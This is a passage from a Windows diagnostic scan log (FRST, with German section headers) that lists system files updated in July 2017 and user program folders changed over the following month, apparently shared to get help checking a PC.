Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe 2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll 2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll 2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv 2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll 2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll 2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll 2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll 2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll 2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll 2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll 2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll 2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll 2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll 2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll 2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll 2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll 2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe 2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll 2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys 2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll 2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys 2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl 2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe 2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll 2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll 2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe 2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll 2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-08-09 18:59 - 2017-03-23 02:42 - 000000000 ____D C:\FRST 2017-08-09 18:57 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA 2017-08-09 18:56 - 2015-03-01 21:28 - 000000000 ____D C:\Users\***\AppData\Roaming\Skype 2017-08-09 18:55 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF 2017-08-09 18:55 - 2015-11-03 03:16 - 000000000 ____D C:\AdwCleaner 2017-08-09 18:54 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Local\Spotify 2017-08-09 18:53 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Roaming\Spotify 2017-08-09 18:47 - 2017-04-19 20:20 - 004124406 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-08-09 18:47 - 2017-03-20 06:35 - 002023472 _____ C:\WINDOWS\system32\perfh007.dat 2017-08-09 18:47 - 2017-03-20 06:35 - 000514080 _____ C:\WINDOWS\system32\perfc007.dat 2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps 2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness 2017-08-09 18:46 - 2015-02-06 18:49 - 000000000 ____D C:\Users\***\AppData\Local\Packages 2017-08-09 18:40 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-08-09 18:40 - 2017-04-19 20:10 - 000000000 ____D C:\Users\*** 2017-08-09 18:40 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-08-08 23:15 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2017-08-08 23:04 - 2015-02-07 15:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Dropbox 2017-08-08 20:32 - 2015-04-10 22:33 - 000000000 ____D C:\Users\***\AppData\Roaming\TS3Client 2017-08-08 19:54 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinMetadata 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer 2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-08-08 19:53 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI 2017-08-08 19:28 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp 2017-08-08 19:28 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT 2017-08-08 19:26 - 2015-02-06 20:57 - 140394280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-08-08 17:25 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598} 2017-08-07 23:51 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit 2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\Roaming\IObit 2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\LocalLow\IObit 2017-08-07 23:31 - 2015-03-09 00:28 - 000000000 ____D C:\Users\***\AppData\Local\Ubisoft Game Launcher 2017-08-07 19:35 - 2017-05-17 19:05 - 000000000 ____D C:\Users\***\AppData\Local\b95cd 2017-08-07 19:15 - 2017-05-02 14:50 - 000000988 _____ C:\Users\Public\Desktop\TomTom MyDrive Connect.lnk 2017-08-07 03:30 - 2016-01-03 14:51 - 000000000 ____D C:\Users\***\AppData\Local\CrashDumps 2017-08-06 16:31 - 2017-04-18 18:59 - 000001457 _____ C:\Users\***\Desktop\KCD.lnk 2017-08-06 13:21 - 2015-02-06 20:34 - 000000000 ____D C:\Users\***\Documents\The Lord of the Rings Online 2017-08-06 12:40 - 2015-02-06 20:39 - 000000000 ____D C:\Users\***\AppData\Local\Turbine 2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2 2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java 2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle 2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk 2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\***\AppData\Roaming\MyPhoneExplorer 2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit 2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\***\AppData\Local\Battle.net 2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache 2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games 2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe 2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe 2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin 2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\***\AppData\Local\Dropbox 2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\***\Dropbox 2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache 2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\***\AppData\Roaming\Mozilla 2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\***\AppData\Local\Google 2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google 2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Origin 2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin 2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\***\Documents\Darkest 2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\***\Documents\The Witcher 3 2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient 2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech 2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox 2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech 2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT 2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk 2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\discord 2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Local\Discord 2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll 2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll 2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll 2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat 2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll 2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat 2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype 2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com] 2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser 2017-07-12 00:35 - 2017-03-18 